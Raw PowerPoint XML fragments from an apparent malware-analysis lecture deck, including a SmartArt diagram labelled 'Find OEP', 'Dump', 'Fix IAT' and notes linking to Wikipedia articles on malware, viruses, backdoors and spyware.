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sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="396" r:id="rId3"/>
    <p:sldId id="338" r:id="rId4"/>
    <p:sldId id="395" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="341" r:id="rId7"/>
    <p:sldId id="340" r:id="rId8"/>
    <p:sldId id="389" r:id="rId9"/>
    <p:sldId id="339" r:id="rId10"/>
    <p:sldId id="342" r:id="rId11"/>
    <p:sldId id="391" r:id="rId12"/>
    <p:sldId id="390" r:id="rId13"/>
    <p:sldId id="392" r:id="rId14"/>
    <p:sldId id="393" r:id="rId15"/>
    <p:sldId id="394" r:id="rId16"/>
    <p:sldId id="402" r:id="rId17"/>
    <p:sldId id="414" r:id="rId18"/>
    <p:sldId id="403" r:id="rId19"/>
    <p:sldId id="411" r:id="rId20"/>
    <p:sldId id="412" r:id="rId21"/>
    <p:sldId id="404" r:id="rId22"/>
    <p:sldId id="413" r:id="rId23"/>
    <p:sldId id="405" r:id="rId24"/>
    <p:sldId id="406" r:id="rId25"/>
    <p:sldId id="407" r:id="rId26"/>
    <p:sldId id="409" r:id="rId27"/>
    <p:sldId id="410" r:id="rId28"/>
    <p:sldId id="408" r:id="rId29"/>
    <p:sldId id="343" r:id="rId30"/>
    <p:sldId id="344" r:id="rId31"/>
    <p:sldId id="258" r:id="rId32"/>
    <p:sldId id="345" r:id="rId33"/>
    <p:sldId id="346" r:id="rId34"/>
    <p:sldId id="347" r:id="rId35"/>
    <p:sldId id="261" r:id="rId36"/>
    <p:sldId id="263" r:id="rId37"/>
    <p:sldId id="265" r:id="rId38"/>
    <p:sldId id="266" r:id="rId39"/>
    <p:sldId id="372" r:id="rId40"/>
    <p:sldId id="356" r:id="rId41"/>
    <p:sldId id="357" r:id="rId42"/>
    <p:sldId id="358" r:id="rId43"/>
    <p:sldId id="359" r:id="rId44"/>
    <p:sldId id="360" r:id="rId45"/>
    <p:sldId id="361" r:id="rId46"/>
    <p:sldId id="362" r:id="rId47"/>
    <p:sldId id="363" r:id="rId48"/>
    <p:sldId id="364" r:id="rId49"/>
    <p:sldId id="365" r:id="rId50"/>
    <p:sldId id="367" r:id="rId51"/>
    <p:sldId id="368" r:id="rId52"/>
    <p:sldId id="369" r:id="rId53"/>
    <p:sldId id="370" r:id="rId54"/>
    <p:sldId id="371" r:id="rId55"/>
    <p:sldId id="373" r:id="rId56"/>
    <p:sldId id="440" r:id="rId57"/>
    <p:sldId id="415" r:id="rId58"/>
    <p:sldId id="416" r:id="rId59"/>
    <p:sldId id="419" r:id="rId60"/>
    <p:sldId id="374" r:id="rId61"/>
    <p:sldId id="375" r:id="rId62"/>
    <p:sldId id="376" r:id="rId63"/>
    <p:sldId id="377" r:id="rId64"/>
    <p:sldId id="378" r:id="rId65"/>
    <p:sldId id="379" r:id="rId66"/>
    <p:sldId id="380" r:id="rId67"/>
    <p:sldId id="381" r:id="rId68"/>
    <p:sldId id="382" r:id="rId69"/>
    <p:sldId id="383" r:id="rId70"/>
    <p:sldId id="384" r:id="rId71"/>
    <p:sldId id="439" r:id="rId72"/>
    <p:sldId id="385" r:id="rId73"/>
    <p:sldId id="386" r:id="rId74"/>
    <p:sldId id="387" r:id="rId75"/>
    <p:sldId id="418" r:id="rId76"/>
    <p:sldId id="388" r:id="rId77"/>
    <p:sldId id="311" r:id="rId78"/>
    <p:sldId id="441" r:id="rId79"/>
    <p:sldId id="442" r:id="rId80"/>
    <p:sldId id="443" r:id="rId81"/>
    <p:sldId id="444" r:id="rId82"/>
    <p:sldId id="420" r:id="rId83"/>
    <p:sldId id="445" r:id="rId84"/>
    <p:sldId id="316" r:id="rId85"/>
    <p:sldId id="313" r:id="rId86"/>
    <p:sldId id="450" r:id="rId87"/>
    <p:sldId id="314" r:id="rId88"/>
    <p:sldId id="447" r:id="rId89"/>
    <p:sldId id="449" r:id="rId90"/>
    <p:sldId id="446" r:id="rId91"/>
    <p:sldId id="448" r:id="rId92"/>
    <p:sldId id="315" r:id="rId93"/>
    <p:sldId id="451" r:id="rId94"/>
    <p:sldId id="317" r:id="rId95"/>
    <p:sldId id="318" r:id="rId96"/>
    <p:sldId id="421" r:id="rId97"/>
    <p:sldId id="422" r:id="rId98"/>
    <p:sldId id="320" r:id="rId99"/>
    <p:sldId id="321" r:id="rId100"/>
    <p:sldId id="322" r:id="rId101"/>
    <p:sldId id="323" r:id="rId102"/>
    <p:sldId id="324" r:id="rId103"/>
    <p:sldId id="325" r:id="rId104"/>
    <p:sldId id="326" r:id="rId105"/>
    <p:sldId id="327" r:id="rId106"/>
    <p:sldId id="328" r:id="rId107"/>
    <p:sldId id="329" r:id="rId108"/>
    <p:sldId id="330" r:id="rId109"/>
    <p:sldId id="331" r:id="rId110"/>
    <p:sldId id="332" r:id="rId111"/>
    <p:sldId id="333" r:id="rId112"/>
    <p:sldId id="334" r:id="rId113"/>
    <p:sldId id="335" r:id="rId114"/>
    <p:sldId id="337" r:id="rId115"/>
    <p:sldId id="424" r:id="rId116"/>
    <p:sldId id="425" r:id="rId117"/>
    <p:sldId id="426" r:id="rId118"/>
    <p:sldId id="427" r:id="rId119"/>
    <p:sldId id="428" r:id="rId120"/>
    <p:sldId id="429" r:id="rId121"/>
    <p:sldId id="438" r:id="rId122"/>
    <p:sldId id="430" r:id="rId123"/>
    <p:sldId id="431" r:id="rId124"/>
    <p:sldId id="432" r:id="rId125"/>
    <p:sldId id="433" r:id="rId126"/>
    <p:sldId id="434" r:id="rId127"/>
    <p:sldId id="435" r:id="rId128"/>
    <p:sldId id="436" r:id="rId129"/>
    <p:sldId id="437"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342" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="-1680" y="-120"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="33" d="100"/>
        <a:sy n="33" d="100"/>
      </p:scale>
      <p:origin x="0" y="45990"/>
    </p:cViewPr>
  </p:outlineViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="1095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D20CCD-3501-4482-9D82-C625C9E9A6F2}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1781408A-B84F-48AF-86E9-EC788F7FB60A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Find OEP</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF59DE3B-CF81-4F5A-8AEB-540EECE6A66F}" type="parTrans" cxnId="{62A6E07C-6064-4A34-8F6A-C4DB3F4EBEA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" type="sibTrans" cxnId="{62A6E07C-6064-4A34-8F6A-C4DB3F4EBEA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Dump</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB98EAE3-6FAC-4679-95E2-684CA7CBE00E}" type="parTrans" cxnId="{8E7CED2B-E429-498E-BD45-37EDDC9BDA86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" type="sibTrans" cxnId="{8E7CED2B-E429-498E-BD45-37EDDC9BDA86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Fix IAT</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DDA6AA7-3C84-4077-8650-BC8EDEC88506}" type="parTrans" cxnId="{4DBC6806-582B-49A8-B538-E3541497D068}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{239D1B70-27EF-4891-9E3C-D75180055982}" type="sibTrans" cxnId="{4DBC6806-582B-49A8-B538-E3541497D068}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" type="pres">
      <dgm:prSet presAssocID="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AEDF2472-DB43-42EF-9125-24866B5F0C11}" type="pres">
      <dgm:prSet presAssocID="{1781408A-B84F-48AF-86E9-EC788F7FB60A}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9118775-B54C-409E-91B3-C93DD951C76E}" type="pres">
      <dgm:prSet presAssocID="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B198D491-B9A1-4C92-AE25-7DB8DBCF7BEA}" type="pres">
      <dgm:prSet presAssocID="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}" type="pres">
      <dgm:prSet presAssocID="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" type="pres">
      <dgm:prSet presAssocID="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8089FB4A-5417-46A9-A52B-1C1B9EF5C970}" type="pres">
      <dgm:prSet presAssocID="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20E28982-8A55-4904-99E4-18AC54723891}" type="pres">
      <dgm:prSet presAssocID="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8E7CED2B-E429-498E-BD45-37EDDC9BDA86}" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}" srcOrd="1" destOrd="0" parTransId="{EB98EAE3-6FAC-4679-95E2-684CA7CBE00E}" sibTransId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}"/>
    <dgm:cxn modelId="{D4963FC3-0FE5-46F4-A16F-B3EB789A1771}" type="presOf" srcId="{1781408A-B84F-48AF-86E9-EC788F7FB60A}" destId="{AEDF2472-DB43-42EF-9125-24866B5F0C11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{0B37285A-88A5-4729-84E8-EF0DEECBF7C6}" type="presOf" srcId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" destId="{8089FB4A-5417-46A9-A52B-1C1B9EF5C970}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{4DBC6806-582B-49A8-B538-E3541497D068}" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}" srcOrd="2" destOrd="0" parTransId="{1DDA6AA7-3C84-4077-8650-BC8EDEC88506}" sibTransId="{239D1B70-27EF-4891-9E3C-D75180055982}"/>
    <dgm:cxn modelId="{8A2CF468-8970-4A3C-A09F-85274C99D6CF}" type="presOf" srcId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" destId="{B198D491-B9A1-4C92-AE25-7DB8DBCF7BEA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5460DEC5-F92B-4CD0-A40A-13EFCAB25804}" type="presOf" srcId="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}" destId="{20E28982-8A55-4904-99E4-18AC54723891}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{62A6E07C-6064-4A34-8F6A-C4DB3F4EBEA0}" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{1781408A-B84F-48AF-86E9-EC788F7FB60A}" srcOrd="0" destOrd="0" parTransId="{BF59DE3B-CF81-4F5A-8AEB-540EECE6A66F}" sibTransId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}"/>
    <dgm:cxn modelId="{2A22573E-6118-4EE7-A243-7E9314A7BBD9}" type="presOf" srcId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" destId="{B9118775-B54C-409E-91B3-C93DD951C76E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E422B86F-CF82-4E47-93BF-058F71D6BD06}" type="presOf" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{BE1E9E75-F9DC-4C24-9C12-CFCA27A075CD}" type="presOf" srcId="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}" destId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7E82A47B-3930-4FE4-A165-AFAFEBDA2AD0}" type="presOf" srcId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" destId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1E237479-E913-4AE8-B7E7-6EF730068DD2}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{AEDF2472-DB43-42EF-9125-24866B5F0C11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6C94DFB5-3D76-4609-A570-65B2E9800570}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{B9118775-B54C-409E-91B3-C93DD951C76E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A115CD8C-6F23-4E29-9619-6F8F87BEED20}" type="presParOf" srcId="{B9118775-B54C-409E-91B3-C93DD951C76E}" destId="{B198D491-B9A1-4C92-AE25-7DB8DBCF7BEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5CB7136D-76D1-47E3-B182-06F38173D4BC}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D6A7D4DB-9876-4591-96C8-6AC91CA567C5}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{488FD6CA-D4EE-4CF5-A9CE-AAB16EB7835E}" type="presParOf" srcId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" destId="{8089FB4A-5417-46A9-A52B-1C1B9EF5C970}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D6E3E268-D2E0-4D7C-B3FD-1DF75D4DEB95}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{20E28982-8A55-4904-99E4-18AC5472389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F2472-DB43-42EF-9125-24866B5F0C11}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7233" y="1907311"/>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Find OEP</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="45225" y="1945303"/>
        <a:ext cx="2085893" cy="1221142"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9118775-B54C-409E-91B3-C93DD951C76E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2385298" y="2287802"/>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GB" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2385298" y="2395031"/>
        <a:ext cx="320822" cy="321687"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3033861" y="1907311"/>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Dump</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3071853" y="1945303"/>
        <a:ext cx="2085893" cy="1221142"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5411926" y="2287802"/>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GB" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5411926" y="2395031"/>
        <a:ext cx="320822" cy="321687"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{20E28982-8A55-4904-99E4-18AC54723891}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6060489" y="1907311"/>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Fix IAT</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6098481" y="1945303"/>
        <a:ext cx="2085893" cy="12211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B0644-BD0B-40B8-AF7A-8CD10AC08897}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>03/05/2019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03A334-FE4D-4C3E-A61B-575B8EC3A56A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="536197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oftware" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Algorithm" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Spyware#cite_note-FTC-REPORT-2005-1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malicious_software" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptosystem" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide9.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_system" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_virus#cite_note-Stallings_2012_p.182-1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Home_router" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Intel_Active_Management_Technology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Plaintext" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Quine_(computing)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Authentication" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Chipse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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400303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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87218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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="986615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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="400010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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3878871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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" smtClean="0">
                <a:solidFill>
